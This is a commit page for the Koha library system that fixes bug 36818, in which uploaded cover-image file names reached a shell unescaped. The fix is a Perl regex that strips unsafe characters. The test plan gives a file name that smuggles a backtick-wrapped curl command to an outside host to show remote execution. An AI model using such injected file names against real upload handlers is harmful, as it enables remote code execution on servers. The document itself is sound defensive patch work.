Bug: 36818 Escape characters in file names uploaded
To test: 1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip' Where the domain is one you can watch the logs from 2/ Upload this file as a cover image 3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames 4/ Choose process, check the logs of the webserver see the connection has been made 5/ Apply the patch 5/ Repeat 2 & 3 and see the filename is now escaped 6/ Choose process and check no errors but no no remote execution occurs 7/ Test uploading actual zip file and images still works Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com> Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com> Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This commit is contained in:
parent
97aa7492ef
commit
da7186ea3d
GPG key ID:
0EF6E2C03357A834
1 changed files with 1 additions and 0 deletions
|
|
@ -264,6 +264,7 @@ sub _dir {
|
|||
sub _hook {
|
||||
my ( $self, $filename, $buffer, $bytes_read, $data ) = @_;
|
||||
$filename= Encode::decode_utf8( $filename ); # UTF8 chars in filename
|
||||
$filename =~ s/[^A-Za-z0-9\-\.]//g;
|
||||
$self->_compute( $filename, $buffer );
|
||||
my $fh = $self->_fh( $filename ) // $self->_create_file( $filename );
|
||||
print $fh $buffer if $fh;
|
||||
|
|
|
|||
Loading…
Reference in a new issue